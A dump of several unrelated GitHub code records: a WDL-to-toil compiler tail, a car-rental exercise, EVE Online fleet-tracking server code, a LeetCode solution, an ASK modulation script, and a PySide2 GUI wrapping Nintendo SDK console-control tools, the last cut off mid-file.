the wdl AST into 2 dictionaries\n with open(wdl_file_path, 'r') as wdl:\n wdl_string = wdl.read()\n ast = wdl_parser.parse(wdl_string).ast()\n w.create_tasks_dict(ast)\n w.create_workflows_dict(ast)\n\n # use the AST dictionaries to write 4 strings\n # these are the future 4 sections of the compiled toil python file\n module_section = w.write_modules()\n fn_section = w.write_functions()\n main_section = w.write_main()\n\n # write 3 strings to a python output file\n w.write_python_file(module_section,\n fn_section,\n main_section,\n w.output_file)\n\n wdllogger.debug('WDL file compiled to toil script. 
Running now.')\n\n if args.gen_parse_files:\n w.write_mappings(w)\n w.write_AST()\n\n cmd = ['python', w.output_file]\n cmd.extend(wdl_run_args)\n subprocess.check_call(cmd)\n\n if not args.dont_delete_compiled:\n os.remove(w.output_file)\n\nif __name__ == '__main__':\n main()","repo_name":"huyu335/toil_ref","sub_path":"wdl/toilwdl.py","file_name":"toilwdl.py","file_ext":"py","file_size_in_byte":100305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41691712130","text":"taxa_dia = float(input(\"Enter the fixed daily rate:\"))\ntaxa_km = float(input(\"Enter the rate per km driven:\"))\n# discount on the fixed daily rate\ndesconto = float(input(\"Enter the discount (%):\"))\ndias = float(input(\"How many days did you use the vehicle?\"))\nkm = float(input(\"How many kilometers did you drive?\"))\n\ntotal_dias = taxa_dia * dias\nvalor_desconto = (total_dias*desconto/100)\ntotal_dias = total_dias - valor_desconto\n\ntotal_km = taxa_km * km\n\ntotal_aluguel = total_dias + total_km\n\nprint(\"Rental total:\",total_aluguel)\nprint(\"% discount:\",desconto,\"Discount amount:\",valor_desconto)\nprint(dias,\"days with the vehicle!\")\nprint(km,\"km driven!\")\n","repo_name":"Migvalentini/PythonProgramacao","sub_path":"PY 03-24 Ex10.py","file_name":"PY 03-24 Ex10.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72013928232","text":"\"\"\"\n Background processing for connected web apps\n\"\"\"\n\nfrom app.flask_shared_modules import mongo\nfrom app.flask_shared_modules import socketio\nfrom app.flask_shared_modules import esiapp\nfrom app.flask_shared_modules import esiclient\n\nfrom app.routes_helpers import (update_token, EsiException, emit_to_char, decode_fleet_member,\n EsiError, esi_error_check_basic, remove_db_sid, json_serial)\n\nfrom pymongo import ReturnDocument\n\nimport json\nimport logging\n\n\ndef background_fleet(user, sid):\n while True:\n try:\n fleet_doc = update_fleet_metadata(user)\n except (EsiError, EsiException) as e:\n emit_to_char('error', str(e), char_id=user.character_id)\n fleet_doc = mongo.db.fleets.find_one({'id': user.fleet_id})\n\n id_filter = {'id': user.character_id}\n result = mongo.db.characters.find_one(id_filter)\n if sid not in result['sid']:\n remove_db_sid(user.character_id, sid)\n logging.error('sid changed, exiting background update for: %s', sid)\n return\n\n if fleet_doc['fc_id'] != user.character_id:\n if fleet_doc['fc_id'] not in fleet_doc['connected_webapps']:\n emit_to_char('error', 'Fleet Boss is not connected to PELD-Fleet. Please have the Fleet Boss connect to PELD-Fleet', char_id=user.character_id)\n socketio.sleep(5)\n continue\n\n try:\n fleet = get_fleet(user, fleet_doc)\n except EsiError as e:\n emit_to_char('error', str(e), sids=result['sid'])\n socketio.sleep(5)\n continue\n except EsiException as e:\n if str(e) == 'not fleet boss':\n if fleet_doc.get('fc_id', 0) == user.character_id:\n emit_to_char('error', 'You are no longer Fleet Boss. 
Please have the new Fleet Boss connect to PELD-Fleet', sids=result['sid'])\n socketio.sleep(5)\n continue\n else:\n emit_to_char('exception', str(e), sids=result['sid'])\n return\n \n fleet_serial = json.dumps(fleet, default=json_serial)\n\n # send update to fleet boss\n emit_to_char('fleet_update', fleet_serial, sids=result['sid'])\n if user.character_id in fleet_doc['connected_webapps']:\n fleet_doc['connected_webapps'].remove(user.character_id)\n\n # send update to fleet members who have been granted access\n if fleet_doc['fleet_access']['fleet_commander']:\n char_id = fleet.get('fleet_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for wing in fleet['wings']:\n if fleet_doc['fleet_access']['wing_commander']:\n char_id = wing.get('wing_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for squad in wing['squads']:\n if fleet_doc['fleet_access']['squad_commander']:\n char_id = squad.get('squad_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n if fleet_doc['fleet_access']['squad_member'] and 'members' in squad:\n for member in squad['members']:\n char_id = member.get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for char_id in fleet_doc['connected_webapps']:\n emit_to_char('error', 'Your Fleet Boss has not granted you access to PELD-Fleet. 
'+\n 'You will not get data until you are granted access', char_id=char_id)\n socketio.sleep(5)\n \ndef update_fleet_metadata(current_user, client=False):\n if client:\n connectedType = 'connected_clients'\n else:\n connectedType = 'connected_webapps'\n\n data_to_update = {}\n update_token(current_user)\n\n op = esiapp.op['get_characters_character_id_fleet'](\n character_id=current_user.get_id()\n )\n fleet = esiclient.request(op)\n esi_error_check_basic(fleet, 'fleet', str(current_user.get_id()))\n\n data_to_update['id'] = fleet.data['fleet_id']\n data_to_update['fc_id'] = fleet.data['fleet_boss_id']\n current_user.set_fleet_id(fleet.data['fleet_id'])\n current_user.set_fleet_role(fleet.data['role'])\n\n # remove from old fleets\n docs = mongo.db.fleets.find({connectedType: current_user.character_id})\n if docs is not None:\n for fleet in docs:\n if fleet['id'] != current_user.fleet_id and current_user.character_id in fleet[connectedType]:\n fleet[connectedType].remove(current_user.character_id)\n update = {'$set': {connectedType: fleet[connectedType]}}\n mongo.db.fleets.update_one({'id': fleet['id']}, update)\n \n _filter = {'id': current_user.fleet_id}\n doc = mongo.db.fleets.find_one(_filter)\n if doc is not None:\n if current_user.character_id not in doc[connectedType]:\n doc[connectedType].append(current_user.character_id)\n data_to_update[connectedType] = doc[connectedType]\n else:\n data_to_update[connectedType] = [current_user.character_id]\n if client:\n data_to_update['connected_webapps'] = []\n else:\n data_to_update['connected_clients'] = []\n data_to_update['members'] = []\n data_to_update['client_access'] = True\n data_to_update['fleet_access'] = {\n 'fleet_commander': False,\n 'wing_commander': False,\n 'squad_commander': False,\n 'squad_member': False\n }\n \n update = {'$set': data_to_update,\n '$currentDate': {'updated_time': {'$type': 'date'} }\n }\n return mongo.db.fleets.find_one_and_update(_filter, update, upsert=True, return_document=ReturnDocument.AFTER)\n\ndef get_fleet(current_user, fleet_doc):\n fleet = {'name': 'Fleet'}\n fleet['wings'] = get_fleet_wings(current_user)\n fleet_members, connected_clients = get_fleet_members(current_user, fleet_doc)\n for member in fleet_members:\n decoded_member = decode_fleet_member(member.copy())\n decoded_member['peld_connected'] = decoded_member['character_id'] in connected_clients\n if member['squad_id'] == -1 and member['wing_id'] == -1:\n fleet['fleet_commander'] = decoded_member\n for wing in fleet['wings']:\n if member['wing_id'] == wing['id']:\n if member['squad_id'] == -1:\n wing['wing_commander'] = decoded_member\n for squad in wing['squads']:\n if member['squad_id'] == squad['id']:\n if member['role_name'].startswith('Squad Commander'):\n squad['squad_commander'] = decoded_member\n else:\n if 'members' not in squad:\n squad['members'] = []\n squad['members'].append(decoded_member)\n fleet['wings'] = sorted(fleet['wings'], key=lambda e:e['id'])\n for wing in fleet['wings']:\n wing['squads'] = sorted(wing['squads'], key=lambda e:e['id'])\n fleet['metadata'] = {\n 'boss': fleet_doc['fc_id'],\n 'fleet_access': fleet_doc['fleet_access'],\n 'client_access': fleet_doc['client_access']\n }\n return fleet\n\ndef get_fleet_members(current_user, fleet_doc):\n update_token(current_user)\n op = esiapp.op['get_fleets_fleet_id_members'](\n fleet_id=current_user.fleet_id\n )\n fleet = esiclient.request(op)\n if fleet.status >= 400 and fleet.status < 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n 
logging.error('error getting fleet members for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n if fleet.status == 404:\n if error_string == \"Not found\":\n raise EsiError(error_string)\n raise EsiException('not fleet boss')\n else:\n raise EsiError(error_string)\n elif fleet.status >= 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet members for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n raise EsiError(error_string)\n new_members = [member['character_id'] for member in fleet.data]\n\n data_to_update = {}\n # audit connected sockets to ensure they are still in fleet\n for member in fleet_doc.get('connected_clients', []):\n if member not in new_members:\n fleet_doc['connected_clients'].remove(member)\n data_to_update['connected_clients'] = fleet_doc.get('connected_clients', [])\n for member in fleet_doc.get('connected_webapps', []):\n if member not in new_members:\n fleet_doc['connected_webapps'].remove(member)\n emit_to_char('error', 'You are no longer in the fleet', char_id=member)\n data_to_update['connected_webapps'] = fleet_doc.get('connected_webapps', [])\n \n data_to_update['id'] = current_user.fleet_id\n data_to_update['fc_id'] = current_user.character_id\n data_to_update['members'] = new_members\n update = {'$set': data_to_update, \n '$currentDate': {'updated_time': {'$type': 'date'} }\n }\n _filter = {'id': current_user.fleet_id}\n mongo.db.fleets.update_one(_filter, update, upsert=True)\n return fleet.data, data_to_update['connected_clients']\n\ndef get_fleet_wings(current_user):\n update_token(current_user)\n op = esiapp.op['get_fleets_fleet_id_wings'](\n fleet_id=current_user.fleet_id\n )\n fleet = esiclient.request(op)\n if fleet.status >= 400 and fleet.status < 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet wings for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n if fleet.status == 404:\n if error_string == \"Not found\":\n raise EsiError(error_string)\n raise EsiException('not fleet boss')\n else:\n raise EsiError(error_string)\n elif fleet.status >= 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet wings for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n raise EsiError(error_string)\n fleet.data.sort(key=lambda x: x['id'])\n for wing in fleet.data:\n wing['squads'].sort(key=lambda x: x['id'])\n return fleet.data\n\n","repo_name":"ArtificialQualia/PELD-Server","sub_path":"app/background_fleet.py","file_name":"background_fleet.py","file_ext":"py","file_size_in_byte":11254,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"28482146834","text":"# https://leetcode.com/problems/longest-consecutive-sequence/\n\nfrom typing import List\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n numset = set(nums)\n longest = 0\n\n for num in nums:\n if num - 1 not in numset:\n length = 0\n counter = num\n while counter in numset:\n counter += 1\n length += 1\n longest = max(length, longest)\n\n return longest\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_12/longest-consecutive-sequence.py","file_name":"longest-consecutive-sequence.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
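The set-based scan in the record above stays O(n) because counting only starts at numbers that open a run (where num - 1 is absent from the set). A minimal standalone sketch of the same idea, with assumed test inputs that are not part of the original record:

from typing import List

def longest_consecutive(nums: List[int]) -> int:
    numset = set(nums)
    longest = 0
    for num in numset:
        # only begin counting at the head of a run
        if num - 1 not in numset:
            length = 1
            while num + length in numset:
                length += 1
            longest = max(longest, length)
    return longest

# assumed inputs for illustration
assert longest_consecutive([100, 4, 200, 1, 3, 2]) == 4  # run 1, 2, 3, 4
assert longest_consecutive([]) == 0

Iterating over numset rather than nums also skips re-checking duplicate values.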
+{"seq_id":"15732951014","text":"import numpy as np\r\nimport pylab as plt\r\n\r\n\r\ndef S2BS(s):\r\n result = []\r\n for c in s:\r\n bit = bin(ord(c))[2:]\r\n if len(bit) < 8:\r\n bit = '0' + bit\r\n result.extend([int(x) for x in bit])\r\n return result\r\n\r\n\r\ndef za1(A1, f, t, phi):\r\n return A1 * np.sin(2 * np.pi * f * t + phi)\r\n\r\n\r\ndef za2(A2, f, t, phi):\r\n return A2 * np.sin(2 * np.pi * f * t + phi)\r\n\r\n\r\ndef DFT(n):\r\n xk = []\r\n for i in range(len(n)):\r\n temp = 0\r\n for j in range(len(n)):\r\n temp += n[j] * np.exp(1j * 2 * np.pi / len(n)) ** (-i * j)\r\n xk.append(temp)\r\n return xk\r\n\r\n\r\ndef M(x):\r\n Re = np.real(x)\r\n Im = np.imag(x)\r\n mk = []\r\n for i in range(0, len(Re)):\r\n mk.append(np.sqrt(Re[i] ** 2 + Im[i] ** 2))\r\n return mk\r\n\r\n\r\n\r\ndef sygASK():\r\n N = 1 / Tb\r\n f = N / Tb\r\n ASK = []\r\n for t in czas:\r\n if x[int(t)] == 0:\r\n ASK.append(za1(A1, f, t, phi))\r\n else:\r\n ASK.append(za2(A2, f, t, phi))\r\n return ASK\r\n\r\n\r\ndef widmoASK():\r\n N = 2\r\n f = N / Tb\r\n wASK = []\r\n for t in czas2:\r\n if x[int(t)] == 0:\r\n wASK.append(za1(A1, f, t, phi))\r\n else:\r\n wASK.append(za2(A2, f, t, phi))\r\n return wASK\r\n\r\n\r\nx = S2BS('text')\r\nprint(x)\r\n# [0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0]\r\nA1 = 1\r\nA2 = 0\r\nTb = 1\r\nphi = 0\r\nczas = np.arange(0, len(x), 0.1)\r\nczas2 = np.arange(0, 10, 0.1)\r\n\r\nASK = sygASK()\r\nwASK = widmoASK()\r\nplt.plot(czas, ASK)\r\nplt.title(\"Zad2 dla ASK\")\r\nplt.xlabel('czas')\r\nplt.show()\r\n\r\nplt.plot(czas2, wASK)\r\nplt.title(\"Zad3 dla ASK\")\r\nplt.xlabel('czas')\r\nplt.show()\r\n\r\nplt.plot(czas, M(DFT(ASK)))\r\nplt.title(\"Zad4 Widmo dla ASK\")\r\nplt.show()\r\n\r\nmax = np.max(ASK)\r\nmin = np.min(ASK)\r\nw = max - min\r\nprint(w)\r\n# W = 1.9021130325903224\r\n","repo_name":"tl45136/Python","sub_path":"Transmisja_Danych/LAB_05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33012055816","text":"import sys\nimport re\nimport subprocess\nfrom subprocess import *\nimport os\nimport PySide2.QtWidgets as QtWidgets\nimport PySide2.QtCore as QtCore\nfrom PySide2.QtGui import *\n\nclass My_Main_Dialog(QtWidgets.QWidget):\n def __init__(self,title):\n super().__init__()\n self.setWindowTitle(title)\n #self.setMinimumHeight(300)\n #self.setMinimumWidth(400)\n self.setFixedSize(400,330)\n self.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n self.create_widgets()\n self.create_layout()\n\n def create_widgets(self):\n self.Main_Menu = QtWidgets.QMenuBar()\n self.File_Menu = self.Main_Menu.addMenu('&File')\n self.View_Menu = self.Main_Menu.addMenu('&View')\n self.Console_Menu = self.Main_Menu.addMenu('&Console')\n self.Tool_Menu = self.Main_Menu.addMenu('&Tool')\n self.Help_Menu = self.Main_Menu.addMenu('&Help')\n # File_Menu\n self.Set_name = self.File_Menu.addAction('Set your console &name')\n self.File_Menu.addSeparator()\n # self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Set_name.triggered.connect(self.set_name)\n self.Swich_app = self.File_Menu.addAction('&Switch to Home Menu')\n self.File_Menu.addSeparator()\n #self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Swich_app.triggered.connect(self.swich_app)\n self.Exit_app = self.File_Menu.addAction('&Exit')\n self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Exit_app.triggered.connect(self.exit_app)\n #View_Menu\n self.Firmware = 
self.View_Menu.addAction(\"&Console Firmware Version\")\n self.View_Menu.addSeparator()\n self.Firmware.triggered.connect(self.firmware_info)\n self.App_List = self.View_Menu.addAction(\"&Installed App List\")\n self.View_Menu.addSeparator()\n self.App_List.triggered.connect(self.application_list)\n self.Console_List = self.View_Menu.addAction('&Registered Target List')\n self.View_Menu.addSeparator()\n self.Console_List.triggered.connect(self.console_list)\n #Console_Menu\n self.Connect_Console = self.Console_Menu.addAction('&Connect')\n self.Connect_Console.setIcon(QIcon(\"connect.png\"))\n self.Console_Menu.addSeparator()\n self.Connect_Console.triggered.connect(self.connect_console)\n self.Disconnect_Console = self.Console_Menu.addAction('&Disconnect')\n self.Disconnect_Console.setIcon(QIcon(\"disconnect.png\"))\n self.Console_Menu.addSeparator()\n self.Disconnect_Console.triggered.connect(self.disconnect_console)\n self.Power_Off = self.Console_Menu.addAction('&Power off')\n self.Power_Off.setIcon(QIcon(\"stand-by.png\"))\n self.Console_Menu.addSeparator()\n self.Power_Off.triggered.connect(self.power_off)\n self.Reboot = self.Console_Menu.addAction('&Reboot')\n self.Reboot.setIcon(QIcon(\"reboot.png\"))\n self.Console_Menu.addSeparator()\n self.Reboot.triggered.connect(self.reboot)\n #Help_Menu\n self.About = self.Help_Menu.addAction('&About')\n self.About.setIcon(QIcon(\"about.png\"))\n self.Help_Menu.addSeparator()\n self.About.triggered.connect(self.about)\n self.Link_menu = self.Help_Menu.addMenu(\"&Links\")\n self.Link_menu.setIcon(QIcon(\"link.png\"))\n self.Home = QtWidgets.QAction(\"&Switch Home\")\n self.Home.setIcon(QIcon(\"home.png\"))\n self.Train_Doc = QtWidgets.QAction(\"&Training Documents\")\n self.Train_Doc.setIcon(QIcon(\"Train_document.png\"))\n self.NDI_Doc = QtWidgets.QAction(\"&NDI Documents\")\n self.NDI_Doc.setIcon(QIcon(\"ndi_document.png\"))\n self.Link_menu.addAction(self.Home)\n self.Link_menu.addSeparator()\n self.Document = self.Link_menu.addMenu(\"&Documents\")\n self.Document.setIcon(QIcon(\"documents.png\"))\n self.Home.triggered.connect(self.home_url)\n self.Document.addAction(self.Train_Doc)\n self.Document.addSeparator()\n self.Train_Doc.triggered.connect(self.training_doc_explorer)\n self.Document.addAction(self.NDI_Doc)\n self.NDI_Doc.triggered.connect(self.ndi_doc)\n\n\n def create_layout(self):\n self.Main_layout = QtWidgets.QVBoxLayout()\n self.Tab_Widget = QtWidgets.QTabWidget()\n self.Tab_Widget.addTab(Tab_Media(), \"Media and Attachments\")\n self.Tab_Widget.addTab(Tab_Applications(), \"Manage Applications\")\n self.Main_layout.addWidget(self.Tab_Widget)\n self.setLayout(self.Main_layout)\n self.Main_layout.setMenuBar(self.Main_Menu)\n\n\n '''***************** File Menu Functions' Declaration *****************'''\n '''Set name to console'''\n def set_name(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n 
sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Set_name_input = QtWidgets.QInputDialog()\n text, ok = self.Set_name_input.getText(self, 'Console Name', 'Make sure console is connected first. \\n\\nEnter name for your console:')\n self.Set_name_input.setOkButtonText(\"datta\")\n if ok and text:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe set-name ' + text\n subprocess.Popen(comm)\n New_name = \"\" + text + \"\"\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Name set Information \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Console Name has been set to: \" +New_name)\n sms_box.setInformativeText(\"Please check Target Name column of Target Manager to reflect changes.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''Switch boot menu to Home'''\n def swich_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Switch to Home Menu: \")\n self.sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n self.sms_box.setText('''Are you sure you want to use this option? 
If you click Yes, console will restart.''')\n self.sms_box.setInformativeText('''Please use this option only once (after you initialize console) to set console's Initial Boot Menu to Home Menu.''')\n self.sms_box.setDetailedText('''This option is used when you want to set console's Initial Boot Menu as \"HOME MENU\" (Usually after initialization)''')\n self.sms_box.setStandardButtons(self.sms_box.Yes | self.sms_box.No)\n self.sms_box.setDefaultButton(self.sms_box.No)\n self.sms_box.setIcon(self.sms_box.Warning)\n self.press = self.sms_box.exec_()\n\n if self.press == self.sms_box.Yes:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\TargetShell.exe switch-menu --menu=homemenu --reset')\n else:\n self.sms_box.close()\n\n '''Exit the application'''\n def exit_app(self):\n self.close()\n\n\n '''***************** View Menu Functions' Declaration *****************'''\n '''Firmware Information'''\n def firmware_info(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Console_Firmware = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe firmware-version')\n self.Firm_Result = self.Console_Firmware.decode(\"latin1\", 'ignore').split('\\n')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Firmware \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(self.Firm_Result[0])\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''get application list'''\n def application_list(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n 
sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''Get Console list'''\n def console_list(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Consoles = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-target')\n self.Console_Result = self.Consoles.decode(\"latin1\", 'ignore').split('\\t')\n result = \"\"\n for i in range(0, len(self.Console_Result) - 1):\n result = result + self.Console_Result[i]\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Consoles \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Registered Consoles: \")\n sms_box.setInformativeText(result)\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''***************** Console Menu Functions' Declaration *****************'''\n '''Connect console'''\n def connect_console(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Switch console has been connected to Nintendo Target Manager\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n #self.Connect_Console.setEnabled(False)\n #self.Disconnect_Console.setEnabled(True)\n\n '''Disconnect console'''\n def disconnect_console(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to disconnect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n 
subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe disconnect')\n sms_box = QtWidgets.QMessageBox()\n #self.sms_box.setParent(self)\n sms_box.setWindowTitle(\"Disconnection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Switch kit has been disconnected from Nintendo Target Manager\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n #self.Disconnect_Console.setEnabled(False)\n #self.Connect_Console.setEnabled(True)\n\n '''Turn off console'''\n def power_off(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to Power Off\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe power-off')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Power Off Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Powering Off console... 